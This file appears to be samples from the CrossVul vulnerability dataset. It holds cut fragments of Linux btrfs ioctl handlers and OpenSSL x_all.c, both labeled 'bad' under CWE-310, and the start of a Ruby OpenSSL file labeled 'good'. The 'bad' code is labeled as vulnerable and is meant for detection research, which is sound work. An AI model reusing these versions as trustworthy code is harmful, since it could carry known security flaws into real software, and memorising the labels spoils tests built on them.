struct btrfs_trans_handle *trans = NULL;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
if (sa->cmd != BTRFS_QUOTA_CTL_RESCAN) {
trans = btrfs_start_transaction(root, 2);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
}
switch (sa->cmd) {
case BTRFS_QUOTA_CTL_ENABLE:
ret = btrfs_quota_enable(trans, root->fs_info);
break;
case BTRFS_QUOTA_CTL_DISABLE:
ret = btrfs_quota_disable(trans, root->fs_info);
break;
case BTRFS_QUOTA_CTL_RESCAN:
ret = btrfs_quota_rescan(root->fs_info);
break;
default:
ret = -EINVAL;
break;
}
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
if (trans) {
err = btrfs_commit_transaction(trans, root);
if (err && !ret)
ret = err;
}
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_assign_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
/* FIXME: check if the IDs really exist */
if (sa->assign) {
ret = btrfs_add_qgroup_relation(trans, root->fs_info,
sa->src, sa->dst);
} else {
ret = btrfs_del_qgroup_relation(trans, root->fs_info,
sa->src, sa->dst);
}
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_create(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_create_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
/* FIXME: check if the IDs really exist */
if (sa->create) {
ret = btrfs_create_qgroup(trans, root->fs_info, sa->qgroupid,
NULL);
} else {
ret = btrfs_remove_qgroup(trans, root->fs_info, sa->qgroupid);
}
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_qgroup_limit(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_qgroup_limit_args *sa;
struct btrfs_trans_handle *trans;
int ret;
int err;
u64 qgroupid;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
goto drop_write;
}
trans = btrfs_join_transaction(root);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
qgroupid = sa->qgroupid;
if (!qgroupid) {
/* take the current subvol as qgroup */
qgroupid = root->root_key.objectid;
}
/* FIXME: check if the IDs really exist */
ret = btrfs_limit_qgroup(trans, root->fs_info, qgroupid, &sa->lim);
err = btrfs_end_transaction(trans, root);
if (err && !ret)
ret = err;
out:
kfree(sa);
drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_set_received_subvol(struct file *file,
void __user *arg)
{
struct btrfs_ioctl_received_subvol_args *sa = NULL;
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_root_item *root_item = &root->root_item;
struct btrfs_trans_handle *trans;
struct timespec ct = CURRENT_TIME;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret < 0)
return ret;
down_write(&root->fs_info->subvol_sem);
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
ret = -EINVAL;
goto out;
}
if (btrfs_root_readonly(root)) {
ret = -EROFS;
goto out;
}
if (!inode_owner_or_capable(inode)) {
ret = -EACCES;
goto out;
}
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa)) {
ret = PTR_ERR(sa);
sa = NULL;
goto out;
}
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
trans = NULL;
goto out;
}
sa->rtransid = trans->transid;
sa->rtime.sec = ct.tv_sec;
sa->rtime.nsec = ct.tv_nsec;
memcpy(root_item->received_uuid, sa->uuid, BTRFS_UUID_SIZE);
btrfs_set_root_stransid(root_item, sa->stransid);
btrfs_set_root_rtransid(root_item, sa->rtransid);
root_item->stime.sec = cpu_to_le64(sa->stime.sec);
root_item->stime.nsec = cpu_to_le32(sa->stime.nsec);
root_item->rtime.sec = cpu_to_le64(sa->rtime.sec);
root_item->rtime.nsec = cpu_to_le32(sa->rtime.nsec);
ret = btrfs_update_root(trans, root->fs_info->tree_root,
&root->root_key, &root->root_item);
if (ret < 0) {
btrfs_end_transaction(trans, root);
trans = NULL;
goto out;
} else {
ret = btrfs_commit_transaction(trans, root);
if (ret < 0)
goto out;
}
ret = copy_to_user(arg, sa, sizeof(*sa));
if (ret)
ret = -EFAULT;
out:
kfree(sa);
up_write(&root->fs_info->subvol_sem);
mnt_drop_write_file(file);
return ret;
}
long btrfs_ioctl(struct file *file, unsigned int
cmd, unsigned long arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
void __user *argp = (void __user *)arg;
switch (cmd) {
case FS_IOC_GETFLAGS:
return btrfs_ioctl_getflags(file, argp);
case FS_IOC_SETFLAGS:
return btrfs_ioctl_setflags(file, argp);
case FS_IOC_GETVERSION:
return btrfs_ioctl_getversion(file, argp);
case FITRIM:
return btrfs_ioctl_fitrim(file, argp);
case BTRFS_IOC_SNAP_CREATE:
return btrfs_ioctl_snap_create(file, argp, 0);
case BTRFS_IOC_SNAP_CREATE_V2:
return btrfs_ioctl_snap_create_v2(file, argp, 0);
case BTRFS_IOC_SUBVOL_CREATE:
return btrfs_ioctl_snap_create(file, argp, 1);
case BTRFS_IOC_SUBVOL_CREATE_V2:
return btrfs_ioctl_snap_create_v2(file, argp, 1);
case BTRFS_IOC_SNAP_DESTROY:
return btrfs_ioctl_snap_destroy(file, argp);
case BTRFS_IOC_SUBVOL_GETFLAGS:
return btrfs_ioctl_subvol_getflags(file, argp);
case BTRFS_IOC_SUBVOL_SETFLAGS:
return btrfs_ioctl_subvol_setflags(file, argp);
case BTRFS_IOC_DEFAULT_SUBVOL:
return btrfs_ioctl_default_subvol(file, argp);
case BTRFS_IOC_DEFRAG:
return btrfs_ioctl_defrag(file, NULL);
case BTRFS_IOC_DEFRAG_RANGE:
return btrfs_ioctl_defrag(file, argp);
case BTRFS_IOC_RESIZE:
return btrfs_ioctl_resize(file, argp);
case BTRFS_IOC_ADD_DEV:
return btrfs_ioctl_add_dev(root, argp);
case BTRFS_IOC_RM_DEV:
return btrfs_ioctl_rm_dev(file, argp);
case BTRFS_IOC_FS_INFO:
return btrfs_ioctl_fs_info(root, argp);
case BTRFS_IOC_DEV_INFO:
return btrfs_ioctl_dev_info(root, argp);
case BTRFS_IOC_BALANCE:
return btrfs_ioctl_balance(file, NULL);
case BTRFS_IOC_CLONE:
return btrfs_ioctl_clone(file, arg, 0, 0, 0);
case BTRFS_IOC_CLONE_RANGE:
return btrfs_ioctl_clone_range(file, argp);
case BTRFS_IOC_TRANS_START:
return btrfs_ioctl_trans_start(file);
case BTRFS_IOC_TRANS_END:
return btrfs_ioctl_trans_end(file);
case BTRFS_IOC_TREE_SEARCH:
return btrfs_ioctl_tree_search(file, argp);
case BTRFS_IOC_INO_LOOKUP:
return btrfs_ioctl_ino_lookup(file, argp);
case BTRFS_IOC_INO_PATHS:
return btrfs_ioctl_ino_to_path(root, argp);
case BTRFS_IOC_LOGICAL_INO:
return btrfs_ioctl_logical_to_ino(root, argp);
case BTRFS_IOC_SPACE_INFO:
return btrfs_ioctl_space_info(root, argp);
case BTRFS_IOC_SYNC:
btrfs_sync_fs(file->f_dentry->d_sb, 1);
return 0;
case BTRFS_IOC_START_SYNC:
return btrfs_ioctl_start_sync(root, argp);
case BTRFS_IOC_WAIT_SYNC:
return btrfs_ioctl_wait_sync(root, argp);
case BTRFS_IOC_SCRUB:
return btrfs_ioctl_scrub(file, argp);
case BTRFS_IOC_SCRUB_CANCEL:
return btrfs_ioctl_scrub_cancel(root, argp);
case BTRFS_IOC_SCRUB_PROGRESS:
return btrfs_ioctl_scrub_progress(root, argp);
case BTRFS_IOC_BALANCE_V2:
return btrfs_ioctl_balance(file, argp);
case BTRFS_IOC_BALANCE_CTL:
return btrfs_ioctl_balance_ctl(root, arg);
case BTRFS_IOC_BALANCE_PROGRESS:
return btrfs_ioctl_balance_progress(root, argp);
case BTRFS_IOC_SET_RECEIVED_SUBVOL:
return btrfs_ioctl_set_received_subvol(file, argp);
case BTRFS_IOC_SEND:
return btrfs_ioctl_send(file, argp);
case BTRFS_IOC_GET_DEV_STATS:
return btrfs_ioctl_get_dev_stats(root, argp);
case BTRFS_IOC_QUOTA_CTL:
return btrfs_ioctl_quota_ctl(file, argp);
case BTRFS_IOC_QGROUP_ASSIGN:
return btrfs_ioctl_qgroup_assign(file, argp);
case BTRFS_IOC_QGROUP_CREATE:
return btrfs_ioctl_qgroup_create(file, argp);
case BTRFS_IOC_QGROUP_LIMIT:
return btrfs_ioctl_qgroup_limit(file, argp);
case BTRFS_IOC_DEV_REPLACE:
return btrfs_ioctl_dev_replace(root, argp);
}
return -ENOTTY;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3783_3 |
crossvul-cpp_data_bad_2309_4 | /* crypto/x509/x_all.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <openssl/stack.h>
#include "cryptlib.h"
#include <openssl/buffer.h>
#include <openssl/asn1.h>
#include <openssl/evp.h>
#include <openssl/x509.h>
#include <openssl/ocsp.h>
#ifndef OPENSSL_NO_RSA
#include <openssl/rsa.h>
#endif
#ifndef OPENSSL_NO_DSA
#include <openssl/dsa.h>
#endif
int X509_verify(X509 *a, EVP_PKEY *r)
{
return(ASN1_item_verify(ASN1_ITEM_rptr(X509_CINF),a->sig_alg,
a->signature,a->cert_info,r));
}
int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r)
{
return( ASN1_item_verify(ASN1_ITEM_rptr(X509_REQ_INFO),
a->sig_alg,a->signature,a->req_info,r));
}
int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r)
{
return(ASN1_item_verify(ASN1_ITEM_rptr(NETSCAPE_SPKAC),
a->sig_algor,a->signature,a->spkac,r));
}
int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md)
{
x->cert_info->enc.modified = 1;
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_CINF), x->cert_info->signature,
x->sig_alg, x->signature, x->cert_info,pkey,md));
}
int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx)
{
x->cert_info->enc.modified = 1;
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CINF),
x->cert_info->signature,
x->sig_alg, x->signature, x->cert_info, ctx);
}
int X509_http_nbio(OCSP_REQ_CTX *rctx, X509 **pcert)
{
return OCSP_REQ_CTX_nbio_d2i(rctx,
(ASN1_VALUE **)pcert, ASN1_ITEM_rptr(X509));
}
int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md)
{
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_REQ_INFO),x->sig_alg, NULL,
x->signature, x->req_info,pkey,md));
}
int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx)
{
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_REQ_INFO),
x->sig_alg, NULL, x->signature, x->req_info, ctx);
}
int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md)
{
x->crl->enc.modified = 1;
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_CRL_INFO),x->crl->sig_alg,
x->sig_alg, x->signature, x->crl,pkey,md));
}
int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx)
{
x->crl->enc.modified = 1;
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CRL_INFO),
x->crl->sig_alg, x->sig_alg, x->signature, x->crl, ctx);
}
int X509_CRL_http_nbio(OCSP_REQ_CTX *rctx, X509_CRL **pcrl)
{
return OCSP_REQ_CTX_nbio_d2i(rctx,
(ASN1_VALUE **)pcrl, ASN1_ITEM_rptr(X509_CRL));
}
int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md)
{
return(ASN1_item_sign(ASN1_ITEM_rptr(NETSCAPE_SPKAC), x->sig_algor,NULL,
x->signature, x->spkac,pkey,md));
}
#ifndef OPENSSL_NO_FP_API
X509 *d2i_X509_fp(FILE *fp, X509 **x509)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509), fp, x509);
}
int i2d_X509_fp(FILE *fp, X509 *x509)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509), fp, x509);
}
#endif
X509 *d2i_X509_bio(BIO *bp, X509 **x509)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509), bp, x509);
}
int i2d_X509_bio(BIO *bp, X509 *x509)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509), bp, x509);
}
#ifndef OPENSSL_NO_FP_API
X509_CRL *d2i_X509_CRL_fp(FILE *fp, X509_CRL **crl)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
}
int i2d_X509_CRL_fp(FILE *fp, X509_CRL *crl)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
}
#endif
X509_CRL *d2i_X509_CRL_bio(BIO *bp, X509_CRL **crl)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
}
int i2d_X509_CRL_bio(BIO *bp, X509_CRL *crl)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
}
#ifndef OPENSSL_NO_FP_API
PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
}
int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
}
#endif
PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
}
int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
}
#ifndef OPENSSL_NO_FP_API
X509_REQ *d2i_X509_REQ_fp(FILE *fp, X509_REQ **req)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
}
int i2d_X509_REQ_fp(FILE *fp, X509_REQ *req)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
}
#endif
X509_REQ *d2i_X509_REQ_bio(BIO *bp, X509_REQ **req)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
}
int i2d_X509_REQ_bio(BIO *bp, X509_REQ *req)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
}
#ifndef OPENSSL_NO_RSA
#ifndef OPENSSL_NO_FP_API
RSA *d2i_RSAPrivateKey_fp(FILE *fp, RSA **rsa)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
}
int i2d_RSAPrivateKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
}
RSA *d2i_RSAPublicKey_fp(FILE *fp, RSA **rsa)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
RSA *d2i_RSA_PUBKEY_fp(FILE *fp, RSA **rsa)
{
return ASN1_d2i_fp((void *(*)(void))
RSA_new,(D2I_OF(void))d2i_RSA_PUBKEY, fp,
(void **)rsa);
}
int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
int i2d_RSA_PUBKEY_fp(FILE *fp, RSA *rsa)
{
return ASN1_i2d_fp((I2D_OF(void))i2d_RSA_PUBKEY,fp,rsa);
}
#endif
RSA *d2i_RSAPrivateKey_bio(BIO *bp, RSA **rsa)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
}
int i2d_RSAPrivateKey_bio(BIO *bp, RSA *rsa)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
}
RSA *d2i_RSAPublicKey_bio(BIO *bp, RSA **rsa)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
}
RSA *d2i_RSA_PUBKEY_bio(BIO *bp, RSA **rsa)
{
return ASN1_d2i_bio_of(RSA,RSA_new,d2i_RSA_PUBKEY,bp,rsa);
}
int i2d_RSAPublicKey_bio(BIO *bp, RSA *rsa)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
}
int i2d_RSA_PUBKEY_bio(BIO *bp, RSA *rsa)
{
return ASN1_i2d_bio_of(RSA,i2d_RSA_PUBKEY,bp,rsa);
}
#endif
#ifndef OPENSSL_NO_DSA
#ifndef OPENSSL_NO_FP_API
DSA *d2i_DSAPrivateKey_fp(FILE *fp, DSA **dsa)
{
return ASN1_d2i_fp_of(DSA,DSA_new,d2i_DSAPrivateKey,fp,dsa);
}
int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa)
{
return ASN1_i2d_fp_of_const(DSA,i2d_DSAPrivateKey,fp,dsa);
}
DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa)
{
return ASN1_d2i_fp_of(DSA,DSA_new,d2i_DSA_PUBKEY,fp,dsa);
}
int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa)
{
return ASN1_i2d_fp_of(DSA,i2d_DSA_PUBKEY,fp,dsa);
}
#endif
DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa)
{
return ASN1_d2i_bio_of(DSA,DSA_new,d2i_DSAPrivateKey,bp,dsa
);
}
int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa)
{
return ASN1_i2d_bio_of_const(DSA,i2d_DSAPrivateKey,bp,dsa);
}
DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa)
{
return ASN1_d2i_bio_of(DSA,DSA_new,d2i_DSA_PUBKEY,bp,dsa);
}
int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa)
{
return ASN1_i2d_bio_of(DSA,i2d_DSA_PUBKEY,bp,dsa);
}
#endif
#ifndef OPENSSL_NO_EC
#ifndef OPENSSL_NO_FP_API
EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey)
{
return ASN1_d2i_fp_of(EC_KEY,EC_KEY_new,d2i_EC_PUBKEY,fp,eckey);
}
int i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey)
{
return ASN1_i2d_fp_of(EC_KEY,i2d_EC_PUBKEY,fp,eckey);
}
EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey)
{
return ASN1_d2i_fp_of(EC_KEY,EC_KEY_new,d2i_ECPrivateKey,fp,eckey);
}
int i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey)
{
return ASN1_i2d_fp_of(EC_KEY,i2d_ECPrivateKey,fp,eckey);
}
#endif
EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey)
{
return ASN1_d2i_bio_of(EC_KEY,EC_KEY_new,d2i_EC_PUBKEY,bp,eckey);
}
int i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *ecdsa)
{
return ASN1_i2d_bio_of(EC_KEY,i2d_EC_PUBKEY,bp,ecdsa);
}
EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey)
{
return ASN1_d2i_bio_of(EC_KEY,EC_KEY_new,d2i_ECPrivateKey,bp,eckey);
}
int i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey)
{
return ASN1_i2d_bio_of(EC_KEY,i2d_ECPrivateKey,bp,eckey);
}
#endif
int X509_pubkey_digest(const X509 *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
ASN1_BIT_STRING *key;
key = X509_get0_pubkey_bitstr(data);
if(!key) return 0;
return EVP_Digest(key->data, key->length, md, len, type, NULL);
}
int X509_digest(const X509 *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509),type,(char *)data,md,len));
}
int X509_CRL_digest(const X509_CRL *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_CRL),type,(char *)data,md,len));
}
int X509_REQ_digest(const X509_REQ *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_REQ),type,(char *)data,md,len));
}
int X509_NAME_digest(const X509_NAME *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_NAME),type,(char *)data,md,len));
}
int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data, const EVP_MD *type,
unsigned char *md, unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(PKCS7_ISSUER_AND_SERIAL),type,
(char *)data,md,len));
}
#ifndef OPENSSL_NO_FP_API
X509_SIG *d2i_PKCS8_fp(FILE *fp, X509_SIG **p8)
{
return ASN1_d2i_fp_of(X509_SIG,X509_SIG_new,d2i_X509_SIG,fp,p8);
}
int i2d_PKCS8_fp(FILE *fp, X509_SIG *p8)
{
return ASN1_i2d_fp_of(X509_SIG,i2d_X509_SIG,fp,p8);
}
#endif
X509_SIG *d2i_PKCS8_bio(BIO *bp, X509_SIG **p8)
{
return ASN1_d2i_bio_of(X509_SIG,X509_SIG_new,d2i_X509_SIG,bp,p8);
}
int i2d_PKCS8_bio(BIO *bp, X509_SIG *p8)
{
return ASN1_i2d_bio_of(X509_SIG,i2d_X509_SIG,bp,p8);
}
#ifndef OPENSSL_NO_FP_API
PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
PKCS8_PRIV_KEY_INFO **p8inf)
{
return ASN1_d2i_fp_of(PKCS8_PRIV_KEY_INFO,PKCS8_PRIV_KEY_INFO_new,
d2i_PKCS8_PRIV_KEY_INFO,fp,p8inf);
}
int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp, PKCS8_PRIV_KEY_INFO *p8inf)
{
return ASN1_i2d_fp_of(PKCS8_PRIV_KEY_INFO,i2d_PKCS8_PRIV_KEY_INFO,fp,
p8inf);
}
int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key)
{
PKCS8_PRIV_KEY_INFO *p8inf;
int ret;
p8inf = EVP_PKEY2PKCS8(key);
if(!p8inf) return 0;
ret = i2d_PKCS8_PRIV_KEY_INFO_fp(fp, p8inf);
PKCS8_PRIV_KEY_INFO_free(p8inf);
return ret;
}
int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey)
{
return ASN1_i2d_fp_of(EVP_PKEY,i2d_PrivateKey,fp,pkey);
}
EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a)
{
return ASN1_d2i_fp_of(EVP_PKEY,EVP_PKEY_new,d2i_AutoPrivateKey,fp,a);
}
int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey)
{
return ASN1_i2d_fp_of(EVP_PKEY,i2d_PUBKEY,fp,pkey);
}
EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a)
{
return ASN1_d2i_fp_of(EVP_PKEY,EVP_PKEY_new,d2i_PUBKEY,fp,a);
}
#endif
PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
PKCS8_PRIV_KEY_INFO **p8inf)
{
return ASN1_d2i_bio_of(PKCS8_PRIV_KEY_INFO,PKCS8_PRIV_KEY_INFO_new,
d2i_PKCS8_PRIV_KEY_INFO,bp,p8inf);
}
int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp, PKCS8_PRIV_KEY_INFO *p8inf)
{
return ASN1_i2d_bio_of(PKCS8_PRIV_KEY_INFO,i2d_PKCS8_PRIV_KEY_INFO,bp,
p8inf);
}
int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key)
{
PKCS8_PRIV_KEY_INFO *p8inf;
int ret;
p8inf = EVP_PKEY2PKCS8(key);
if(!p8inf) return 0;
ret = i2d_PKCS8_PRIV_KEY_INFO_bio(bp, p8inf);
PKCS8_PRIV_KEY_INFO_free(p8inf);
return ret;
}
int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey)
{
return ASN1_i2d_bio_of(EVP_PKEY,i2d_PrivateKey,bp,pkey);
}
EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a)
{
return ASN1_d2i_bio_of(EVP_PKEY,EVP_PKEY_new,d2i_AutoPrivateKey,bp,a);
}
int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey)
{
return ASN1_i2d_bio_of(EVP_PKEY,i2d_PUBKEY,bp,pkey);
}
EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a)
{
return ASN1_d2i_bio_of(EVP_PKEY,EVP_PKEY_new,d2i_PUBKEY,bp,a);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_2309_4 |
crossvul-cpp_data_good_5329_0 | /*
* 'OpenSSL for Ruby' project
* Copyright (C) 2001-2002 Michal Rokos <m.rokos@sh.cvut.cz>
* All rights reserved.
*/
/*
* This program is licensed under the same licence as Ruby.
* (See the file 'LICENCE'.)
*/
#include "ossl.h"
#define NewCipher(klass) \
TypedData_Wrap_Struct((klass), &ossl_cipher_type, 0)
